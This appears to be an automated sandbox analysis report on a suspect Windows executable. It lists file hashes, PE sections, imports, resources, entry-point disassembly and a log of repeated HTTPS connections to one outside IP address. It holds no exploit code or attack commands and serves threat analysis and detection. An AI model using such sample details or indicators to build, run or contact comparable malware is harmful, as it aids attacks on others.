                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="256213" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.465423210865031
                                            Encrypted:false
                                            SSDEEP:6144:yIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNodwBCswSbf:3XD94+WlLZMM6YFHW+f
                                            MD5:1DD672031F174B3F728ECFDD8635986B
                                            SHA1:FC2CF2991EDB1E034961DD75B9A06F985BFD4E07
                                            SHA-256:02676B069FB0023820B2C40E183D9295F0E5F5CC767A76A9E694867707C0C991
                                            SHA-512:27527F56351A94F510837013F189E83A9989BC266B8743F52D4974F3DEFAAD50B7684C742436503CD6D144C89164425860C00A1F468E6FF6A24448EE6F5F2B13
                                            Malicious:false
                                            Reputation:low
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.043014706881447
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:20qMFnd9tO.exe
                                            File size:327'680 bytes
                                            MD5:0f4a71f80cd80f172817f116318e3fca
                                            SHA1:cf0d014f19140c6fb86beeeb078cc3cc9fe99a77
                                            SHA256:fe2ad4001c817a77de2e7d4ca694833fef66c99beee799333fc84e74da4cad5e
                                            SHA512:02686e82b3377a4992dcd6eadef59ed8a6c662ccbff5ba62b26e3fcaa4055de62e105f3fbcf6145f7db32ee10f07a08eeee14b4c5cbf885c0ec805ce429c684f
                                            SSDEEP:6144:Z1TgTn1Xa1/0LgICwFehTyUu/N90kiPSx1:4T1Xa07CwYTyUIN6kii
                                            TLSH:FE64E012B2A0D039D3575A31F834CAE10AFE7CE17A75418B77942B3A6E703D14A3775A
                                            Icon Hash:13694d4529170717
                                            Entrypoint:0x4028b2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x642B9336 [Tue Apr 4 03:02:14 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:257369aa226cb4b09879eb1a5063d4d0
                                            Instruction
                                            call 00007F8BD4B7B070h
                                            jmp 00007F8BD4B76D1Eh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 00411270h
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007F8BD4B76E9Eh
                                            test byte ptr [eax], 00000008h
                                            je 00007F8BD4B76E99h
                                            mov dword ptr [ebp-0Ch], 01994000h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            push dword ptr [ebp-10h]
                                            push dword ptr [ebp-1Ch]
                                            push dword ptr [ebp-20h]
                                            call dword ptr [004110B8h]
                                            leave
                                            retn 0008h
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [00448358h], eax
                                            mov dword ptr [00448354h], ecx
                                            mov dword ptr [00448350h], edx
                                            mov dword ptr [0044834Ch], ebx
                                            mov dword ptr [00448348h], esi
                                            mov dword ptr [00448344h], edi
                                            mov word ptr [00448370h], ss
                                            mov word ptr [00448364h], cs
                                            mov word ptr [00448340h], ds
                                            mov word ptr [0044833Ch], es
                                            mov word ptr [00448338h], fs
                                            mov word ptr [00448334h], gs
                                            pushfd
                                            pop dword ptr [00448368h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [0044835Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [00448360h], eax
                                            lea eax, dword ptr [ebp+08h]
                                            Programming Language:
                                            • [ASM] VS2010 build 30319
                                            • [ C ] VS2010 build 30319
                                            • [C++] VS2010 build 30319
                                            • [IMP] VS2008 SP1 build 30729
                                            • [RES] VS2010 build 30319
                                            • [LNK] VS2010 build 30319
                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x45624 | 0x64 | .rdata
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14b000 | 0x7fa8 | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x11000 | 0x190 | .rdata
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                             .text | 0x1000 | 0xfe03 | 0x10000 | 6173bb3398a7dfd89c1ebab6d5098a1b | False | 0.5941009521484375 | data | 6.640039901281461 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rdata | 0x11000 | 0x34f4a | 0x35000 | f00c53c350f43c08d0575548128e8555 | False | 0.8214226488797169 | data | 7.280492539967257 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .data | 0x46000 | 0x1042e4 | 0x2c00 | 72a7b0c0760143d0d7d6b90b9fe0db88 | False | 0.15793678977272727 | data | 1.8740820881414495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .rsrc | 0x14b000 | 0x7fa8 | 0x8000 | ada8c25a9f038add6de88e59ee94f67c | False | 0.548614501953125 | data | 5.566127611494106 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                             RT_CURSOR | 0x151d08 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 |  |  | 0.4276315789473684
                                             RT_CURSOR | 0x151e50 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" |  |  | 0.75
                                             RT_ICON | 0x14b490 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Spanish | Peru | 0.43336886993603413
                                             RT_ICON | 0x14c338 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Spanish | Peru | 0.5717509025270758
                                             RT_ICON | 0x14cbe0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Spanish | Peru | 0.6319124423963134
                                             RT_ICON | 0x14d2a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Spanish | Peru | 0.7109826589595376
                                             RT_ICON | 0x14d810 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Spanish | Peru | 0.5571576763485477
                                             RT_ICON | 0x14fdb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Spanish | Peru | 0.5898217636022514
                                             RT_ICON | 0x150e60 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Spanish | Peru | 0.6717213114754098
                                             RT_ICON | 0x1517e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Spanish | Peru | 0.7092198581560284
                                             RT_DIALOG | 0x152190 | 0x98 | data |  |  | 0.7631578947368421
                                             RT_STRING | 0x152228 | 0xee | data |  |  | 0.5588235294117647
                                             RT_STRING | 0x152318 | 0x6e2 | data |  |  | 0.42622020431328034
                                             RT_STRING | 0x152a00 | 0x160 | data |  |  | 0.4971590909090909
                                             RT_STRING | 0x152b60 | 0x448 | data |  |  | 0.458029197080292
                                             RT_ACCELERATOR | 0x151cc8 | 0x40 | data |  |  | 0.859375
                                             RT_GROUP_CURSOR | 0x151e38 | 0x14 | data |  |  | 1.15
                                             RT_GROUP_CURSOR | 0x151f88 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
                                             RT_GROUP_ICON | 0x151c50 | 0x76 | data | Spanish | Peru | 0.6610169491525424
                                             RT_VERSION | 0x151fa0 | 0x1f0 | MS Windows COFF PowerPC object file |  |  | 0.5745967741935484
                                             DLL | Import
                                             KERNEL32.dll | CreateFileA, GetNumaProcessorNode, DebugActiveProcessStop, GetConsoleAliasExesLengthA, SetUnhandledExceptionFilter, InterlockedIncrement, HeapFree, WaitForSingleObject, SetComputerNameW, ConnectNamedPipe, GetModuleHandleW, ReadConsoleOutputA, GlobalFindAtomA, LoadLibraryW, GetLocaleInfoW, GetFileAttributesA, HeapCreate, lstrcpynW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, SetConsoleTitleA, GetLastError, GetLongPathNameW, GetThreadLocale, GetProcAddress, CreateHardLinkW, SetConsoleDisplayMode, FindAtomA, SetSystemTime, SetConsoleTitleW, HeapSetInformation, GetCurrentDirectoryA, DeleteCriticalSection, SetCalendarInfoA, FindAtomW, CreateFileW, ReadFile, FlushFileBuffers, HeapReAlloc, GetStringTypeW, HeapAlloc, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, IsProcessorFeaturePresent, WriteFile, GetStdHandle, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, Sleep, RtlUnwind, MultiByteToWideChar, HeapSize, SetStdHandle, WriteConsoleW, LCMapStringW, CloseHandle
                                             USER32.dll | CopyRect, GetMonitorInfoW, LoadIconA
                                             ole32.dll | CoTaskMemFree
                                             WINHTTP.dll | WinHttpAddRequestHeaders, WinHttpCloseHandle
                                             Language of compilation system | Country where language is spoken | Map
                                             Spanish | Peru | 
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 08:10:51.908591986 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:51.908616066 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:51.908703089 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:51.911645889 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:51.911659956 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.116060019 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.116137981 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.118597031 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.118602037 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.118838072 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.161897898 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.165304899 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.165333986 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.165384054 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.615932941 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.616091967 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.616172075 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.617983103 CET | 49730 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.617994070 CET | 443 | 49730 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.641308069 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.641350031 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.641418934 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.641761065 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.641772985 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.840208054 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.840389013 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.841604948 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.841609955 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.841830969 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:52.842931032 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.842946053 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:52.842992067 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358082056 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358155012 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358194113 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358207941 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.358230114 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358268976 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.358274937 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358305931 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358341932 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358342886 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.358352900 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358386040 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.358395100 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358562946 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358604908 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.358609915 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358778954 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358804941 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358817101 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.358822107 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.358856916 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.359184027 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.359282970 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.359327078 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.359610081 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.359623909 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.359637022 CET | 49731 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.359641075 CET | 443 | 49731 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.482522011 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.482553005 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.482625961 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.482954025 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.482964993 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.687671900 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.687753916 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.689045906 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.689054012 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.689290047 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.690526962 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.690684080 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.690718889 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:53.690768957 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:53.690777063 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.186060905 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.186182976 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.186248064 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.186357021 CET | 49732 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.186371088 CET | 443 | 49732 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.289649010 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.289680004 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.289767027 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.290132999 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.290144920 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.490412951 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.490502119 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.491708040 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.491713047 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.491954088 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.493043900 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.493164062 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:54.493191957 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.985831976 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.986028910 CET | 443 | 49733 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:54.986083984 CET | 49733 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.156390905 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.156418085 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.156486988 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.156829119 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.156840086 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.355298996 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.355432034 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.363248110 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.363253117 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.363503933 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.364717007 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.364835978 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.364869118 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.364999056 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.365008116 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.779160023 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.779278040 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:55.779337883 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.779479027 CET | 49734 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:55.779491901 CET | 443 | 49734 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:56.548998117 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.549024105 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:56.549103022 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.549417019 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.549428940 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:56.750353098 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:56.750442028 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.751746893 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.751753092 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:56.751986980 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:56.753150940 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.753274918 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:56.753304958 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.222826958 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.222935915 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.222995996 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.223119020 CET | 49735 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.223131895 CET | 443 | 49735 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.296659946 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.296699047 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.296773911 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.297111034 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.297125101 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.497092009 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.497184992 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.504642963 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.504653931 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.504892111 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.510032892 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.510119915 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.510124922 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.993424892 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.993541002 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:57.993588924 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.993659973 CET | 49736 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:57.993673086 CET | 443 | 49736 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.607095003 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.607125998 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.607203960 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.607521057 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.607533932 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.808880091 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.808958054 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.811065912 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.811074972 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.811304092 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.812504053 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813225985 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813254118 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.813339949 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813366890 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.813467979 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813536882 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
